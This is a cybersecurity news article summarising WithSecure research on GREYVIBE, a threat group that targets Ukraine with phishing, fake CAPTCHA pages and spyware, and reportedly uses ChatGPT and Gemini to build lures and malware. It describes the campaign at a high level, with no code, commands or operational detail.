GREYVIBE hackers are increasingly leveraging generative AI tools such as ChatGPT and Google Gemini to enhance cyberattack operations.
The campaign, active since at least August 2025, primarily targets Ukraine and related entities across the government, military, and civilian sectors, highlighting a growing convergence between artificial intelligence and modern cyber warfare.
WithSecure researchers identified GREYVIBE as a previously untracked threat group exhibiting consistent overlaps in infrastructure, tooling, and operational behavior across multiple campaigns.
While no definitive attribution has been established, the group’s activities strongly align with Russian state interests, particularly intelligence-gathering objectives linked to the ongoing Russia-Ukraine conflict.
Supporting evidence includes Russian-language artifacts, Moscow time zone activity patterns, and targeting aligned with Ukrainian institutions.
GREYVIBE Abuses ChatGPT, Gemini AI
GREYVIBE employs a multi-vector attack strategy, combining spear-phishing emails, fake CAPTCHA verification pages, and fraudulent websites to distribute malware.
In spear-phishing campaigns, attackers impersonate Ukrainian government agencies and distribute malicious archives via cloud services such as Google Drive.
These payloads execute decoy documents while silently initiating infection chains using custom loaders.
Another notable tactic involves fake CAPTCHA pages designed to trick victims into executing malicious commands under the guise of verification steps.
Additionally, the group operates deceptive “adult club” websites targeting Ukrainian individuals, particularly military personnel.
Example of fake captcha site and prompted instructions (Ukrainian) (Source: Withsecure labs)
These platforms not only deliver malware such as FallSpy for Android and PhantomRelay for Windows, but also engage in social engineering through fake personas on messaging platforms like Telegram.
A key finding in the report is GREYVIBE’s systematic use of generative AI across the attack lifecycle.
Tools such as ChatGPT, Google Gemini, and Ideogram AI were reportedly used to generate phishing lures, develop malware components, and support post-compromise activities.
Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan.
This AI-assisted approach appears to help the group compensate for limited technical sophistication while accelerating development cycles.
It also reduces reliance on reused code, making traditional attribution methods more difficult. However, the group’s reliance on AI has introduced flaws.
WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, enabling researchers to monitor attacker activity over time.
Examples of LLM markers present across images used by GREYVIBE (Source: Withsecure labs)
GREYVIBE’s malware toolkit includes PhantomRelay, a modular RAT that uses WebSockets for command execution, and FallSpy, an Android spyware that exfiltrates sensitive data, including contacts, location, and device information.
LegionRelay further extends its capabilities by enabling file theft, screenshot capture, and exfiltration of messaging data.
Despite its effectiveness, GREYVIBE demonstrates signs of operational immaturity. Researchers noted poor operational security practices, including uploading test samples to public platforms and inconsistent tooling.
At the same time, overlaps with known cybercrime infrastructure suggest possible links to former or active cybercriminal actors, indicating a hybrid threat model.
The emergence of GREYVIBE underscores how generative AI is reshaping the threat landscape. By lowering technical barriers and enabling rapid tool development, AI is empowering even moderately skilled actors to conduct complex cyber operations, complicating detection, attribution, and defense efforts.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
The post GREYVIBE Hackers Leverage ChatGPT and Google Gemini to Fuel Cyberattacks appeared first on Cyber Security News.
